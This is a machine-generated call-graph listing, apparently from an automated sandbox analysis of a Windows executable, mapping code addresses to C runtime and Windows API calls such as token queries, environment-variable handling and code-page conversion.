17488->17495 17496 7ff79a330858 17488->17496 17489->17488 17490 7ff79a32a884 _invalid_parameter_noinfo 37 API calls 17490->17492 17492->17416 17495->17490 17495->17492 17498 7ff79a33087c WideCharToMultiByte 17496->17498 17500 7ff79a320db1 17499->17500 17501 7ff79a320dc3 17499->17501 17502 7ff79a324f78 memcpy_s 11 API calls 17500->17502 17504 7ff79a320dd0 17501->17504 17507 7ff79a320e0d 17501->17507 17503 7ff79a320db6 17502->17503 17505 7ff79a32a950 _invalid_parameter_noinfo 37 API calls 17503->17505 17506 7ff79a32a884 _invalid_parameter_noinfo 37 API calls 17504->17506 17511 7ff79a320dc1 17505->17511 17506->17511 17508 7ff79a320eb6 17507->17508 17509 7ff79a324f78 memcpy_s 11 API calls 17507->17509 17510 7ff79a324f78 memcpy_s 11 API calls 17508->17510 17508->17511 17512 7ff79a320eab 17509->17512 17513 7ff79a320f60 17510->17513 17511->17388 17514 7ff79a32a950 _invalid_parameter_noinfo 37 API calls 17512->17514 17515 7ff79a32a950 _invalid_parameter_noinfo 37 API calls 17513->17515 17514->17508 17515->17511 17520 7ff79a32ecad 17516->17520 17517 7ff79a32ecb2 17518 7ff79a32524d 17517->17518 17519 7ff79a324f78 memcpy_s 11 API calls 17517->17519 17518->17360 17518->17367 17521 7ff79a32ecbc 17519->17521 17520->17517 17520->17518 17523 7ff79a32ecfc 17520->17523 17522 7ff79a32a950 _invalid_parameter_noinfo 37 API calls 17521->17522 17522->17518 17523->17518 17524 7ff79a324f78 memcpy_s 11 API calls 17523->17524 17524->17521 17526 7ff79a3187a1 GetTokenInformation 17525->17526 17527 7ff79a318823 __vcrt_freefls 17525->17527 17528 7ff79a3187c2 GetLastError 17526->17528 17531 7ff79a3187cd 17526->17531 17529 7ff79a31883c 17527->17529 17530 7ff79a318836 CloseHandle 17527->17530 17528->17527 17528->17531 17529->16666 17530->17529 17531->17527 17532 7ff79a3187e9 GetTokenInformation 17531->17532 17532->17527 17533 7ff79a31880c 17532->17533 17533->17527 17534 7ff79a318816 ConvertSidToStringSidW 17533->17534 17534->17527 17536 7ff79a31c8c0 17535->17536 17537 7ff79a312b74 GetCurrentProcessId 17536->17537 17538 7ff79a3126b0 48 API calls 17537->17538 17539 7ff79a312bc7 17538->17539 17540 7ff79a324c48 48 API calls 17539->17540 17541 7ff79a312c10 MessageBoxW 17540->17541 17542 7ff79a31c5c0 _log10_special 8 API calls 17541->17542 17543 7ff79a312c40 17542->17543 17543->16677 17545 7ff79a3125e5 17544->17545 17546 7ff79a324c48 48 API calls 17545->17546 17547 7ff79a312604 17546->17547 17547->16693 17552 7ff79a3181cc 17551->17552 17553 7ff79a319400 2 API calls 17552->17553 17554 7ff79a3181eb 17553->17554 17741 7ff79a31455a 17740->17741 17742 7ff79a319400 2 API calls 17741->17742 17743 7ff79a31457f 17742->17743 17744 7ff79a31c5c0 _log10_special 8 API calls 17743->17744 17745 7ff79a3145a7 17744->17745 17745->16729 17747 7ff79a317e1e 17746->17747 17748 7ff79a317f42 17747->17748 17749 7ff79a311c80 49 API calls 17747->17749 17750 7ff79a31c5c0 _log10_special 8 API calls 17748->17750 17755 7ff79a317ea5 17749->17755 17751 7ff79a317f73 17750->17751 17751->16729 17752 7ff79a311c80 49 API calls 17752->17755 17753 7ff79a314550 10 API calls 17753->17755 17754 7ff79a317efb 17756 7ff79a319400 2 API calls 17754->17756 17755->17748 17755->17752 17755->17753 17755->17754 17759 7ff79a311637 17758->17759 17760 7ff79a311613 17758->17760 17761 7ff79a3145b0 108 API calls 17759->17761 17879 7ff79a311050 17760->17879 17763 7ff79a31164b 17761->17763 17765 7ff79a311682 17763->17765 17766 7ff79a311653 17763->17766 17769 7ff79a3145b0 108 API calls 17765->17769 17768 7ff79a324f78 memcpy_s 11 API calls 17766->17768 17771 7ff79a311658 17768->17771 17772 7ff79a311696 17769->17772 17807 7ff79a317134 17806->17807 17809 7ff79a31717b 17806->17809 17807->17809 17943 7ff79a325094 17807->17943 17809->16729 17811 7ff79a314191 17810->17811 17812 7ff79a3144d0 49 API calls 17811->17812 17813 7ff79a3141cb 17812->17813 17814 7ff79a3144d0 49 API calls 17813->17814 17815 7ff79a3141db 17814->17815 17855 7ff79a311c80 49 API calls 17854->17855 17856 7ff79a314464 17855->17856 17856->16729 17880 7ff79a3145b0 108 API calls 17879->17880 17881 7ff79a31108c 17880->17881 17882 7ff79a3110a9 17881->17882 17883 7ff79a311094 17881->17883 17944 7ff79a3250a1 17943->17944 17945 7ff79a3250ce 17943->17945 17947 7ff79a324f78 memcpy_s 11 API calls 17944->17947 17955 7ff79a325058 17944->17955 17946 7ff79a3250f1 17945->17946 17949 7ff79a32510d 17945->17949 17948 7ff79a324f78 memcpy_s 11 API calls 17946->17948 17950 7ff79a3250ab 17947->17950 17952 7ff79a324fbc 45 API calls 17949->17952 17957 7ff79a325101 17952->17957 17955->17807 17957->17807 18022 7ff79a325f38 18021->18022 18023 7ff79a325f5e 18022->18023 18026 7ff79a325f91 18022->18026 18024 7ff79a324f78 memcpy_s 11 API calls 18023->18024 18025 7ff79a325f63 18024->18025 18027 7ff79a32a950 _invalid_parameter_noinfo 37 API calls 18025->18027 18028 7ff79a325f97 18026->18028 18029 7ff79a325fa4 18026->18029 18031 7ff79a314606 18027->18031 18032 7ff79a324f78 memcpy_s 11 API calls 18028->18032 18040 7ff79a32ac98 18029->18040 18031->16754 18032->18031 18053 7ff79a330348 EnterCriticalSection 18040->18053 18414 7ff79a327968 18413->18414 18417 7ff79a327444 18414->18417 18416 7ff79a327981 18416->16764 18418 7ff79a32748e 18417->18418 18419 7ff79a32745f 18417->18419 18427 7ff79a3254dc EnterCriticalSection 18418->18427 18421 7ff79a32a884 _invalid_parameter_noinfo 37 API calls 18419->18421 18423 7ff79a32747f 18421->18423 18423->18416 18429 7ff79a31fee1 18428->18429 18430 7ff79a31feb3 18428->18430 18437 7ff79a31fed3 18429->18437 18438 7ff79a3254dc EnterCriticalSection 18429->18438 18431 7ff79a32a884 _invalid_parameter_noinfo 37 API calls 18430->18431 18431->18437 18437->16768 18440 7ff79a3145b0 108 API calls 18439->18440 18441 7ff79a311493 18440->18441 18546 7ff79a316365 18545->18546 18547 7ff79a311c80 49 API calls 18546->18547 18548 7ff79a3163a1 18547->18548 18549 7ff79a3163aa 18548->18549 18550 7ff79a3163cd 18548->18550 18551 7ff79a312710 54 API calls 18549->18551 18552 7ff79a314620 49 API calls 18550->18552 18835 7ff79a32b1c0 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 18834->18835 18836 7ff79a32a451 18835->18836 18837 7ff79a32a574 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 18836->18837 18838 7ff79a32a471 18837->18838 19064 7ff79a330938 19065 7ff79a33095c 19064->19065 19068 7ff79a33096c 19064->19068 19066 7ff79a324f78 memcpy_s 11 API calls 19065->19066 19086 7ff79a330961 19066->19086 19067 7ff79a330c4c 19070 7ff79a324f78 memcpy_s 11 API calls 19067->19070 19068->19067 19069 7ff79a33098e 19068->19069 19071 7ff79a3309af 19069->19071 19195 7ff79a330ff4 19069->19195 19072 7ff79a330c51 19070->19072 19075 7ff79a330a21 19071->19075 19077 7ff79a3309d5 19071->19077 19082 7ff79a330a15 19071->19082 19074 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19072->19074 19074->19086 19079 7ff79a32ec08 memcpy_s 11 API calls 19075->19079 19093 7ff79a3309e4 19075->19093 19076 7ff79a330ace 19085 7ff79a330aeb 19076->19085 19094 7ff79a330b3d 19076->19094 19210 7ff79a329730 19077->19210 19083 7ff79a330a37 19079->19083 19081 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19081->19086 19082->19076 19082->19093 19216 7ff79a33719c 19082->19216 19087 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19083->19087 19090 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19085->19090 19091 7ff79a330a45 19087->19091 19088 7ff79a3309fd 19088->19082 19096 7ff79a330ff4 45 API calls 19088->19096 19089 7ff79a3309df 19092 7ff79a324f78 memcpy_s 11 API calls 19089->19092 19095 7ff79a330af4 19090->19095 19091->19082 19091->19093 19098 7ff79a32ec08 memcpy_s 11 API calls 19091->19098 19092->19093 19093->19081 19094->19093 19097 7ff79a33344c 40 API calls 19094->19097 19105 7ff79a330af9 19095->19105 19252 7ff79a33344c 19095->19252 19096->19082 19099 7ff79a330b7a 19097->19099 19100 7ff79a330a67 19098->19100 19101 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19099->19101 19103 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19100->19103 19104 7ff79a330b84 19101->19104 19103->19082 19104->19093 19104->19105 19106 7ff79a330c40 19105->19106 19110 7ff79a32ec08 memcpy_s 11 API calls 19105->19110 19108 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19106->19108 19107 7ff79a330b25 19109 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19107->19109 19108->19086 19109->19105 19111 7ff79a330bc8 19110->19111 19112 7ff79a330bd9 19111->19112 19113 7ff79a330bd0 19111->19113 19115 7ff79a32a514 __std_exception_copy 37 API calls 19112->19115 19114 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19113->19114 19116 7ff79a330bd7 19114->19116 19117 7ff79a330be8 19115->19117 19122 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19116->19122 19118 7ff79a330c7b 19117->19118 19119 7ff79a330bf0 19117->19119 19121 7ff79a32a970 _isindst 17 API calls 19118->19121 19261 7ff79a3372b4 19119->19261 19124 7ff79a330c8f 19121->19124 19122->19086 19127 7ff79a330cb8 19124->19127 19134 7ff79a330cc8 19124->19134 19125 7ff79a330c17 19130 7ff79a324f78 memcpy_s 11 API calls 19125->19130 19126 7ff79a330c38 19129 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19126->19129 19128 7ff79a324f78 memcpy_s 11 API calls 19127->19128 19131 7ff79a330cbd 19128->19131 19129->19106 19132 7ff79a330c1c 19130->19132 19135 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19132->19135 19133 7ff79a330fab 19137 7ff79a324f78 memcpy_s 11 API calls 19133->19137 19134->19133 19136 7ff79a330cea 19134->19136 19135->19116 19141 7ff79a330d07 19136->19141 19280 7ff79a3310dc 19136->19280 19138 7ff79a330fb0 19137->19138 19140 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19138->19140 19140->19131 19142 7ff79a330d7b 19141->19142 19144 7ff79a330d2f 19141->19144 19150 7ff79a330d6f 19141->19150 19146 7ff79a330da3 19142->19146 19151 7ff79a32ec08 memcpy_s 11 API calls 19142->19151 19162 7ff79a330d3e 19142->19162 19143 7ff79a330e2e 19155 7ff79a330e4b 19143->19155 19163 7ff79a330e9e 19143->19163 19295 7ff79a32976c 19144->19295 19148 7ff79a32ec08 memcpy_s 11 API calls 19146->19148 19146->19150 19146->19162 19156 7ff79a330dc5 19148->19156 19149 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19149->19131 19150->19143 19150->19162 19301 7ff79a33705c 19150->19301 19157 7ff79a330d95 19151->19157 19153 7ff79a330d39 19159 7ff79a324f78 memcpy_s 11 API calls 19153->19159 19154 7ff79a330d57 19154->19150 19165 7ff79a3310dc 45 API calls 19154->19165 19160 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19155->19160 19161 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19156->19161 19158 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19157->19158 19158->19146 19159->19162 19164 7ff79a330e54 19160->19164 19161->19150 19162->19149 19163->19162 19166 7ff79a33344c 40 API calls 19163->19166 19169 7ff79a33344c 40 API calls 19164->19169 19171 7ff79a330e5a 19164->19171 19165->19150 19167 7ff79a330edc 19166->19167 19168 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19167->19168 19170 7ff79a330ee6 19168->19170 19173 7ff79a330e86 19169->19173 19170->19162 19170->19171 19172 7ff79a330f9f 19171->19172 19176 7ff79a32ec08 memcpy_s 11 API calls 19171->19176 19174 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19172->19174 19175 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19173->19175 19174->19131 19175->19171 19177 7ff79a330f2b 19176->19177 19178 7ff79a330f3c 19177->19178 19179 7ff79a330f33 19177->19179 19181 7ff79a3304e4 37 API calls 19178->19181 19180 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19179->19180 19182 7ff79a330f3a 19180->19182 19183 7ff79a330f4a 19181->19183 19189 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19182->19189 19184 7ff79a330f52 SetEnvironmentVariableW 19183->19184 19185 7ff79a330fdf 19183->19185 19186 7ff79a330f97 19184->19186 19187 7ff79a330f76 19184->19187 19188 7ff79a32a970 _isindst 17 API calls 19185->19188 19190 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19186->19190 19191 7ff79a324f78 memcpy_s 11 API calls 19187->19191 19192 7ff79a330ff3 19188->19192 19189->19131 19190->19172 19193 7ff79a330f7b 19191->19193 19194 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19193->19194 19194->19182 19196 7ff79a331029 19195->19196 19197 7ff79a331011 19195->19197 19198 7ff79a32ec08 memcpy_s 11 API calls 19196->19198 19197->19071 19205 7ff79a33104d 19198->19205 19199 7ff79a3310ae 19202 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19199->19202 19200 7ff79a32a574 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 19201 7ff79a3310d8 19200->19201 19202->19197 19203 7ff79a32ec08 memcpy_s 11 API calls 19203->19205 19204 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19204->19205 19205->19199 19205->19203 19205->19204 19206 7ff79a32a514 __std_exception_copy 37 API calls 19205->19206 19207 7ff79a3310bd 19205->19207 19209 7ff79a3310d2 19205->19209 19206->19205 19208 7ff79a32a970 _isindst 17 API calls 19207->19208 19208->19209 19209->19200 19211 7ff79a329740 19210->19211 19212 7ff79a329749 19210->19212 19211->19212 19325 7ff79a329208 19211->19325 19212->19088 19212->19089 19217 7ff79a3371a9 19216->19217 19218 7ff79a3362c4 19216->19218 19220 7ff79a324fbc 45 API calls 19217->19220 19219 7ff79a3362d1 19218->19219 19225 7ff79a336307 19218->19225 19222 7ff79a324f78 memcpy_s 11 API calls 19219->19222 19240 7ff79a336278 19219->19240 19221 7ff79a3371dd 19220->19221 19224 7ff79a3371e2 19221->19224 19229 7ff79a3371f3 19221->19229 19233 7ff79a33720a 19221->19233 19226 7ff79a3362db 19222->19226 19223 7ff79a336331 19227 7ff79a324f78 memcpy_s 11 API calls 19223->19227 19224->19082 19225->19223 19230 7ff79a336356 19225->19230 19231 7ff79a32a950 _invalid_parameter_noinfo 37 API calls 19226->19231 19228 7ff79a336336 19227->19228 19232 7ff79a32a950 _invalid_parameter_noinfo 37 API calls 19228->19232 19234 7ff79a324f78 memcpy_s 11 API calls 19229->19234 19237 7ff79a324fbc 45 API calls 19230->19237 19244 7ff79a336341 19230->19244 19235 7ff79a3362e6 19231->19235 19232->19244 19238 7ff79a337226 19233->19238 19239 7ff79a337214 19233->19239 19236 7ff79a3371f8 19234->19236 19235->19082 19243 7ff79a32a950 _invalid_parameter_noinfo 37 API calls 19236->19243 19237->19244 19241 7ff79a337237 19238->19241 19242 7ff79a33724e 19238->19242 19245 7ff79a324f78 memcpy_s 11 API calls 19239->19245 19240->19082 19548 7ff79a336314 19241->19548 19557 7ff79a338fbc 19242->19557 19243->19224 19244->19082 19248 7ff79a337219 19245->19248 19250 7ff79a32a950 _invalid_parameter_noinfo 37 API calls 19248->19250 19250->19224 19251 7ff79a324f78 memcpy_s 11 API calls 19251->19224 19253 7ff79a33346e 19252->19253 19256 7ff79a33348b 19252->19256 19254 7ff79a33347c 19253->19254 19253->19256 19257 7ff79a324f78 memcpy_s 11 API calls 19254->19257 19255 7ff79a333495 19604 7ff79a337ce4 19255->19604 19256->19255 19597 7ff79a337ca8 19256->19597 19260 7ff79a333481 memcpy_s 19257->19260 19260->19107 19262 7ff79a324fbc 45 API calls 19261->19262 19263 7ff79a33731a 19262->19263 19264 7ff79a337328 19263->19264 19616 7ff79a32ef94 19263->19616 19619 7ff79a32551c 19264->19619 19268 7ff79a337414 19271 7ff79a337425 19268->19271 19272 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19268->19272 19269 7ff79a324fbc 45 API calls 19270 7ff79a337397 19269->19270 19274 7ff79a32ef94 5 API calls 19270->19274 19277 7ff79a3373a0 19270->19277 19273 7ff79a330c13 19271->19273 19275 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19271->19275 19272->19271 19273->19125 19273->19126 19274->19277 19275->19273 19276 7ff79a32551c 14 API calls 19278 7ff79a3373fb 19276->19278 19277->19276 19278->19268 19279 7ff79a337403 SetEnvironmentVariableW 19278->19279 19279->19268 19281 7ff79a33111c 19280->19281 19287 7ff79a3310ff 19280->19287 19282 7ff79a32ec08 memcpy_s 11 API calls 19281->19282 19290 7ff79a331140 19282->19290 19283 7ff79a3311a1 19285 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19283->19285 19284 7ff79a32a574 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 19286 7ff79a3311ca 19284->19286 19285->19287 19287->19141 19288 7ff79a32ec08 memcpy_s 11 API calls 19288->19290 19289 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19289->19290 19290->19283 19290->19288 19290->19289 19291 7ff79a3304e4 37 API calls 19290->19291 19292 7ff79a3311b0 19290->19292 19294 7ff79a3311c4 19290->19294 19291->19290 19293 7ff79a32a970 _isindst 17 API calls 19292->19293 19293->19294 19294->19284 19296 7ff79a32977c 19295->19296 19300 7ff79a329785 19295->19300 19296->19300 19641 7ff79a32927c 19296->19641 19300->19153 19300->19154 19302 7ff79a337069 19301->19302 19307 7ff79a337096 19301->19307 19303 7ff79a33706e 19302->19303 19302->19307 19304 7ff79a324f78 memcpy_s 11 API calls 19303->19304 19305 7ff79a337073 19304->19305 19308 7ff79a32a950 _invalid_parameter_noinfo 37 API calls 19305->19308 19306 7ff79a3370da 19310 7ff79a324f78 memcpy_s 11 API calls 19306->19310 19307->19306 19309 7ff79a3370f9 19307->19309 19323 7ff79a3370ce __crtLCMapStringW 19307->19323 19312 7ff79a33707e 19308->19312 19313 7ff79a337115 19309->19313 19314 7ff79a337103 19309->19314 19311 7ff79a3370df 19310->19311 19315 7ff79a32a950 _invalid_parameter_noinfo 37 API calls 19311->19315 19312->19150 19317 7ff79a324fbc 45 API calls 19313->19317 19316 7ff79a324f78 memcpy_s 11 API calls 19314->19316 19315->19323 19318 7ff79a337108 19316->19318 19319 7ff79a337122 19317->19319 19320 7ff79a32a950 _invalid_parameter_noinfo 37 API calls 19318->19320 19319->19323 19688 7ff79a338b78 19319->19688 19320->19323 19323->19150 19324 7ff79a324f78 memcpy_s 11 API calls 19324->19323 19326 7ff79a32921d 19325->19326 19327 7ff79a329221 19325->19327 19326->19212 19340 7ff79a32955c 19326->19340 19348 7ff79a332660 19327->19348 19332 7ff79a32923f 19374 7ff79a3292ec 19332->19374 19333 7ff79a329233 19335 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19333->19335 19335->19326 19337 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19338 7ff79a329266 19337->19338 19339 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19338->19339 19339->19326 19341 7ff79a32959e 19340->19341 19342 7ff79a329585 19340->19342 19341->19342 19343 7ff79a32ec08 memcpy_s 11 API calls 19341->19343 19344 7ff79a32962e 19341->19344 19345 7ff79a330858 WideCharToMultiByte 19341->19345 19347 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19341->19347 19342->19212 19343->19341 19346 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19344->19346 19345->19341 19346->19342 19347->19341 19349 7ff79a33266d 19348->19349 19353 7ff79a329226 19348->19353 19393 7ff79a32b294 19349->19393 19354 7ff79a33299c GetEnvironmentStringsW 19353->19354 19355 7ff79a3329cc 19354->19355 19356 7ff79a32922b 19354->19356 19357 7ff79a330858 WideCharToMultiByte 19355->19357 19356->19332 19356->19333 19358 7ff79a332a1d 19357->19358 19359 7ff79a332a24 FreeEnvironmentStringsW 19358->19359 19360 7ff79a32d66c _fread_nolock 12 API calls 19358->19360 19359->19356 19361 7ff79a332a37 19360->19361 19362 7ff79a332a48 19361->19362 19363 7ff79a332a3f 19361->19363 19364 7ff79a330858 WideCharToMultiByte 19362->19364 19365 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19363->19365 19367 7ff79a332a6b 19364->19367 19366 7ff79a332a46 19365->19366 19366->19359 19368 7ff79a332a79 19367->19368 19369 7ff79a332a6f 19367->19369 19371 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19368->19371 19370 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19369->19370 19372 7ff79a332a77 FreeEnvironmentStringsW 19370->19372 19371->19372 19372->19356 19375 7ff79a329311 19374->19375 19376 7ff79a32ec08 memcpy_s 11 API calls 19375->19376 19388 7ff79a329347 19376->19388 19377 7ff79a32934f 19378 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19377->19378 19379 7ff79a329247 19378->19379 19379->19337 19380 7ff79a3293c2 19381 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19380->19381 19381->19379 19382 7ff79a32ec08 memcpy_s 11 API calls 19382->19388 19383 7ff79a3293b1 19542 7ff79a329518 19383->19542 19385 7ff79a32a514 __std_exception_copy 37 API calls 19385->19388 19387 7ff79a3293e7 19391 7ff79a32a970 _isindst 17 API calls 19387->19391 19388->19377 19388->19380 19388->19382 19388->19383 19388->19385 19388->19387 19390 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19388->19390 19389 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19389->19377 19390->19388 19392 7ff79a3293fa 19391->19392 19394 7ff79a32b2c0 FlsSetValue 19393->19394 19395 7ff79a32b2a5 FlsGetValue 19393->19395 19397 7ff79a32b2b2 19394->19397 19398 7ff79a32b2cd 19394->19398 19396 7ff79a32b2ba 19395->19396 19395->19397 19396->19394 19399 7ff79a32b2b8 19397->19399 19400 7ff79a32a574 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 19397->19400 19401 7ff79a32ec08 memcpy_s 11 API calls 19398->19401 19413 7ff79a332334 19399->19413 19403 7ff79a32b335 19400->19403 19402 7ff79a32b2dc 19401->19402 19404 7ff79a32b2fa FlsSetValue 19402->19404 19405 7ff79a32b2ea FlsSetValue 19402->19405 19407 7ff79a32b318 19404->19407 19408 7ff79a32b306 FlsSetValue 19404->19408 19406 7ff79a32b2f3 19405->19406 19409 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19406->19409 19410 7ff79a32af64 memcpy_s 11 API calls 19407->19410 19408->19406 19409->19397 19411 7ff79a32b320 19410->19411 19412 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19411->19412 19412->19399 19436 7ff79a3325a4 19413->19436 19415 7ff79a332369 19451 7ff79a332034 19415->19451 19418 7ff79a332386 19418->19353 19419 7ff79a32d66c _fread_nolock 12 API calls 19420 7ff79a332397 19419->19420 19421 7ff79a33239f 19420->19421 19423 7ff79a3323ae 19420->19423 19422 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19421->19422 19422->19418 19423->19423 19458 7ff79a3326dc 19423->19458 19426 7ff79a3324aa 19427 7ff79a324f78 memcpy_s 11 API calls 19426->19427 19429 7ff79a3324af 19427->19429 19428 7ff79a332505 19431 7ff79a33256c 19428->19431 19469 7ff79a331e64 19428->19469 19432 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19429->19432 19430 7ff79a3324c4 19430->19428 19433 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19430->19433 19435 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19431->19435 19432->19418 19433->19428 19435->19418 19437 7ff79a3325c7 19436->19437 19440 7ff79a3325d1 19437->19440 19484 7ff79a330348 EnterCriticalSection 19437->19484 19441 7ff79a332643 19440->19441 19443 7ff79a32a574 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 19440->19443 19441->19415 19444 7ff79a33265b 19443->19444 19446 7ff79a3326b2 19444->19446 19448 7ff79a32b294 50 API calls 19444->19448 19446->19415 19449 7ff79a33269c 19448->19449 19450 7ff79a332334 65 API calls 19449->19450 19450->19446 19452 7ff79a324fbc 45 API calls 19451->19452 19453 7ff79a332048 19452->19453 19454 7ff79a332066 19453->19454 19455 7ff79a332054 GetOEMCP 19453->19455 19456 7ff79a33206b GetACP 19454->19456 19457 7ff79a33207b 19454->19457 19455->19457 19456->19457 19457->19418 19457->19419 19459 7ff79a332034 47 API calls 19458->19459 19460 7ff79a332709 19459->19460 19461 7ff79a33285f 19460->19461 19462 7ff79a332746 IsValidCodePage 19460->19462 19468 7ff79a332760 memcpy_s 19460->19468 19463 7ff79a31c5c0 _log10_special 8 API calls 19461->19463 19462->19461 19464 7ff79a332757 19462->19464 19465 7ff79a3324a1 19463->19465 19466 7ff79a332786 GetCPInfo 19464->19466 19464->19468 19465->19426 19465->19430 19466->19461 19466->19468 19485 7ff79a33214c 19468->19485 19541 7ff79a330348 EnterCriticalSection 19469->19541 19486 7ff79a332189 GetCPInfo 19485->19486 19495 7ff79a33227f 19485->19495 19491 7ff79a33219c 19486->19491 19486->19495 19487 7ff79a31c5c0 _log10_special 8 API calls 19489 7ff79a33231e 19487->19489 19488 7ff79a332eb0 48 API calls 19490 7ff79a332213 19488->19490 19489->19461 19496 7ff79a337bf4 19490->19496 19491->19488 19494 7ff79a337bf4 54 API calls 19494->19495 19495->19487 19497 7ff79a324fbc 45 API calls 19496->19497 19498 7ff79a337c19 19497->19498 19501 7ff79a3378c0 19498->19501 19502 7ff79a337901 19501->19502 19503 7ff79a32f910 _fread_nolock MultiByteToWideChar 19502->19503 19507 7ff79a33794b 19503->19507 19504 7ff79a337bc9 19506 7ff79a31c5c0 _log10_special 8 API calls 19504->19506 19505 7ff79a337a81 19505->19504 19510 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19505->19510 19508 7ff79a332246 19506->19508 19507->19504 19507->19505 19509 7ff79a32d66c _fread_nolock 12 API calls 19507->19509 19511 7ff79a337983 19507->19511 19508->19494 19509->19511 19510->19504 19511->19505 19512 7ff79a32f910 _fread_nolock MultiByteToWideChar 19511->19512 19513 7ff79a3379f6 19512->19513 19513->19505 19532 7ff79a32f154 19513->19532 19516 7ff79a337a41 19516->19505 19519 7ff79a32f154 __crtLCMapStringW 6 API calls 19516->19519 19517 7ff79a337a92 19518 7ff79a32d66c _fread_nolock 12 API calls 19517->19518 19520 7ff79a337b64 19517->19520 19521 7ff79a337ab0 19517->19521 19518->19521 19519->19505 19520->19505 19522 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19520->19522 19521->19505 19523 7ff79a32f154 __crtLCMapStringW 6 API calls 19521->19523 19522->19505 19524 7ff79a337b30 19523->19524 19524->19520 19525 7ff79a337b50 19524->19525 19526 7ff79a337b66 19524->19526 19528 7ff79a330858 WideCharToMultiByte 19525->19528 19527 7ff79a330858 WideCharToMultiByte 19526->19527 19529 7ff79a337b5e 19527->19529 19528->19529 19529->19520 19530 7ff79a337b7e 19529->19530 19530->19505 19531 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19530->19531 19531->19505 19533 7ff79a32ed80 __crtLCMapStringW 5 API calls 19532->19533 19534 7ff79a32f192 19533->19534 19535 7ff79a32f19a 19534->19535 19538 7ff79a32f240 19534->19538 19535->19505 19535->19516 19535->19517 19537 7ff79a32f203 LCMapStringW 19537->19535 19539 7ff79a32ed80 __crtLCMapStringW 5 API calls 19538->19539 19540 7ff79a32f26e __crtLCMapStringW 19539->19540 19540->19537 19546 7ff79a32951d 19542->19546 19547 7ff79a3293b9 19542->19547 19543 7ff79a329546 19545 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19543->19545 19544 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19544->19546 19545->19547 19546->19543 19546->19544 19547->19389 19549 7ff79a336348 19548->19549 19550 7ff79a336331 19548->19550 19549->19550 19553 7ff79a336356 19549->19553 19551 7ff79a324f78 memcpy_s 11 API calls 19550->19551 19552 7ff79a336336 19551->19552 19554 7ff79a32a950 _invalid_parameter_noinfo 37 API calls 19552->19554 